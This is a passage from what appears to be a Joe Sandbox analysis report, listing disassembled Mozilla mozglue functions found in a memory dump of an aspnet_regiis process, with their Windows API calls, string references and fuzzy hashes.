                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF02F
                                                                                                                                                                      • Part of subcall function 6C7DF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7DF09B
                                                                                                                                                                      • Part of subcall function 6C7DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C7DF0AC
                                                                                                                                                                      • Part of subcall function 6C7DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C7DF0BE
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C7DEED7
                                                                                                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C7DF008
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                    • API String ID: 16519850-1833026159
                                                                                                                                                                    • Opcode ID: cf9e687f0fd278a9ecdf8cc44ab07f61bb09f76968cb7da30c8e99fc953db022
                                                                                                                                                                    • Instruction ID: a73215d5030dc057c48ccb8216c52f67a195589160273597b927aaa026e450a6
                                                                                                                                                                    • Opcode Fuzzy Hash: cf9e687f0fd278a9ecdf8cc44ab07f61bb09f76968cb7da30c8e99fc953db022
                                                                                                                                                                    • Instruction Fuzzy Hash: 615148716042179FEB219F66D60E7A67BF8EB6632CF110579E91983F41CB306804C7E2
                                                                                                                                                                    Function 6C7A7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C7A8007
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C7A801D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C7A802B
                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C7A803D
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C7A808D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C7A809B
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80B9
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7A80DF
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80ED
                                                                                                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80FB
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A810D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7A8133
                                                                                                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C7A8149
                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C7A8167
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C7A817C
                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A8199
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                    • String ID: 0>}l
                                                                                                                                                                    • API String ID: 2721933968-554681839
                                                                                                                                                                    • Opcode ID: 0b99740a1239d53b2f59b553611e9c719a70bc6777faefd16bf33f47492199cc
                                                                                                                                                                    • Instruction ID: 1b00cdd2cb636683e568dae2b42b515390ce0086be39b3a6c386f45ee7506b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b99740a1239d53b2f59b553611e9c719a70bc6777faefd16bf33f47492199cc
                                                                                                                                                                    • Instruction Fuzzy Hash: AB5194B1E002449BDB10DFA9DD84AEFB7B9EF49264F140239E815E7741E730A905CBA1
                                                                                                                                                                    Function 6C7A5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5E9D
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A5EAB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A5EB8
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5ECF
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C7A6017
                                                                                                                                                                      • Part of subcall function 6C794310: moz_xmalloc.MOZGLUE(00000010,?,6C7942D2), ref: 6C79436A
                                                                                                                                                                      • Part of subcall function 6C794310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7942D2), ref: 6C794387
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C7A5F47
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A5F53
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7A5F5C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A5F66
                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C7A5F7E
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C7A5F27
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A5E8C
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A605D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A60CC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                    • String ID: GeckoMain
                                                                                                                                                                    • API String ID: 3711609982-966795396
                                                                                                                                                                    • Opcode ID: ac96d18bd0fd188dbde771bee873cabf641b37dec44ffae55d47fe3052004c45
                                                                                                                                                                    • Instruction ID: a2384093c9c988eed4569191dffbb27144f868f3d0cebe2303411463442f0a47
                                                                                                                                                                    • Opcode Fuzzy Hash: ac96d18bd0fd188dbde771bee873cabf641b37dec44ffae55d47fe3052004c45
                                                                                                                                                                    • Instruction Fuzzy Hash: 777101B06047419FD710DF69D584A6ABBF0FF59308F004A7DE48687B42D730E989CB92
                                                                                                                                                                    Function 6C7A9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C793217
                                                                                                                                                                      • Part of subcall function 6C7931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C793236
                                                                                                                                                                      • Part of subcall function 6C7931C0: FreeLibrary.KERNEL32 ref: 6C79324B
                                                                                                                                                                      • Part of subcall function 6C7931C0: __Init_thread_footer.LIBCMT ref: 6C793260
                                                                                                                                                                      • Part of subcall function 6C7931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C79327F
                                                                                                                                                                      • Part of subcall function 6C7931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C79328E
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7932AB
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7932D1
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7932E5
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7932F7
                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C7A9675
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9697
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7A96E8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C7A9707
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A971F
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9773
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7A97B7
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97D0
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97EB
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9824
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                    • Opcode ID: 97d23599226d09b42dc1717ea9c7e46d4c3a4a33debf6ea1abd1d38ef2d9ac0c
                                                                                                                                                                    • Instruction ID: b8c4a2cc9ce97396711eea9cb74b539df2146fbd9dd8df3cd4c9e28299921230
                                                                                                                                                                    • Opcode Fuzzy Hash: 97d23599226d09b42dc1717ea9c7e46d4c3a4a33debf6ea1abd1d38ef2d9ac0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 4161B5717042429BDF20CFA4DA89A9A7BF1EB6B318F104A39F91583F50D7319855CBD1
                                                                                                                                                                    Function 6C7F6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C81F618), ref: 6C7F6694
                                                                                                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7F66B1
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F66B9
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7F66E1
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F618), ref: 6C7F6734
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7F673A
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F618), ref: 6C7F676C
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7F67FC
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C7F6868
                                                                                                                                                                    • RtlCaptureContext.NTDLL ref: 6C7F687F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                    • String ID: WalkStack64
                                                                                                                                                                    • API String ID: 2357170935-3499369396
                                                                                                                                                                    • Opcode ID: 4bff853ba2be0100cfbb63af21d73c0c411b3c5a8330302ca0f38e9c3a4790b0
                                                                                                                                                                    • Instruction ID: d2f45311d7b94a2bcb0b834dbf0a8bdfac94883dc92cee8de6611c3532058e15
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff853ba2be0100cfbb63af21d73c0c411b3c5a8330302ca0f38e9c3a4790b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 57516F71A09302AFD721CF25CA85A5ABBF4BF89718F00492DF5A997B40D770E905CB92
                                                                                                                                                                    Function 6C7DDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDE73
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDF7D
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DDF8A
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DDFC9
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDFF7
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DE000
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C7A4A68), ref: 6C7DDE7B
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C7A4A68), ref: 6C7DDEB8
                                                                                                                                                                    • free.MOZGLUE(00000000,?,6C7A4A68), ref: 6C7DDEFE
                                                                                                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C7DDF38
                                                                                                                                                                    Strings
                                                                                                                                                                    • <none>, xrefs: 6C7DDFD7
                                                                                                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C7DE00E
                                                                                                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C7DDE83
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                    • API String ID: 1281939033-809102171
                                                                                                                                                                    • Opcode ID: dec5615ba76c91c5297e539752b91880da378fbaf7e15c0517b6289336077f0c
                                                                                                                                                                    • Instruction ID: 98351d9b94e4f61c2bc5ca17b11784a51abf74ca4d4e5e8c86966bf82cb765e9
                                                                                                                                                                    • Opcode Fuzzy Hash: dec5615ba76c91c5297e539752b91880da378fbaf7e15c0517b6289336077f0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 924106717012129BEB309F65DA0D7AA77F5EBA530DF150439E92997F01CB30A805CBEA
                                                                                                                                                                    Function 6C7ED840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED85F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED86C
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED918
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED93C
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED948
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED970
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED976
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED982
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED9CF
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7EDA2E
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7EDA6F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7EDA78
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C7EDA91
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7EDAB7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1195625958-0
                                                                                                                                                                    • Opcode ID: dc61e21695b1cf995bcf1c4af091b607629f218132188e6bfb0003dd3ea1451a
                                                                                                                                                                    • Instruction ID: 15e70a343995ee62624768a419ccb97c1ae7a475e033726eab4ac417fbb7bb85
                                                                                                                                                                    • Opcode Fuzzy Hash: dc61e21695b1cf995bcf1c4af091b607629f218132188e6bfb0003dd3ea1451a
                                                                                                                                                                    • Instruction Fuzzy Hash: F771AE756043059FCB10CF28C888BAABBF5FF89318F15857EE85A9B701DB30A945CB91
                                                                                                                                                                    Function 6C7ED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED4F0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED4FC
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED52A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED530
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED53F
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED55F
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7ED585
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7ED5D3
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED5F9
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED605
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED652
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED658
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED667
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED6A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2206442479-0
                                                                                                                                                                    • Opcode ID: f200789d4f6e552fa571feda080e33b4ef926fd1e0bc811512a612117211af34
                                                                                                                                                                    • Instruction ID: feb9c13713543a68e640a8f28b90fb3482ec2eb7311862828c72b12d9a772009
                                                                                                                                                                    • Opcode Fuzzy Hash: f200789d4f6e552fa571feda080e33b4ef926fd1e0bc811512a612117211af34
